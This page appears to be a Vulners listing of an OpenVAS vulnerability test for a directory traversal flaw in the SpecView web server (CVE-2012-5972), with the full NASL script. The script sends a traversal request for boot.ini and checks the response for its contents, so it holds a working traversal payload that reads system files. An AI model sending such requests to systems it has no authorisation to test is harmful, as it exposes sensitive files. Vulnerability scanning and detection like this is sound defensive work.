Lucene search
K

SpecView Web Server Directory Traversal Vulnerability

🗓️ 02 Jul 2012 00:00:00Reported by This script is Copyright (C) 2012 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 15 Views

SpecView Web Server Directory Traversal Vulnerability, allows remote attackers to retrieve arbitrary files by exploiting a directory-traversal vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-5972
29 Jun 201200:00
circl
CVE
CVE-2012-5972
17 Jan 201316:00
cve
Cvelist
CVE-2012-5972 SpecView Directory Traversal
17 Jan 201316:00
cvelist
ICS
SpecView Directory Traversal
15 Oct 201306:00
ics
NVD
CVE-2012-5972
17 Jan 201316:55
nvd
OpenVAS
SpecView Web Server Directory Traversal Vulnerability (Jul 2012) - Active Check
2 Jul 201200:00
openvas
Prion
Directory traversal
17 Jan 201316:55
prion
Positive Technologies
PT-2013-1865 · Specview · Specview
17 Jan 201300:00
ptsecurity
RedhatCVE
CVE-2012-5972
22 May 202500:43
redhatcve
SourceLink
securityfocuswww.securityfocus.com/bid/54243
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_SpecView_54243.nasl 6697 2017-07-12 11:40:05Z cfischer $
#
# SpecView Web Server Directory Traversal Vulnerability
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "SpecView is prone to a directory-traversal vulnerability because it
fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-
traversal sequences ('../') to retrieve arbitrary files in the context
of the application.

Exploiting this issue may allow an attacker to obtain sensitive
information that could aid in further attacks.";


if (description)
{
 script_id(103506);
 script_bugtraq_id(54243);
 script_cve_id("CVE-2012-5972");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_version ("$Revision: 6697 $");

 script_name("SpecView Web Server Directory Traversal Vulnerability");

 script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/54243");

 script_tag(name:"last_modification", value:"$Date: 2017-07-12 13:40:05 +0200 (Wed, 12 Jul 2017) $");
 script_tag(name:"creation_date", value:"2012-07-02 12:15:35 +0200 (Mon, 02 Jul 2012)");
 script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
 script_dependencies("gb_get_http_banner.nasl");
 script_require_ports("Services/www", 80);
 script_mandatory_keys("SpecView/banner");

 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
include("global_settings.inc");
   
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

banner = get_http_banner(port:port);
if("SpecView" >!< banner)exit(0);

url = '/.../.../.../.../.../.../boot.ini'; 

if(http_vuln_check(port:port, url:url,pattern:"\[boot loader\]")) {
     
  security_message(port:port);
  exit(0);

}

exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jul 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.07614
15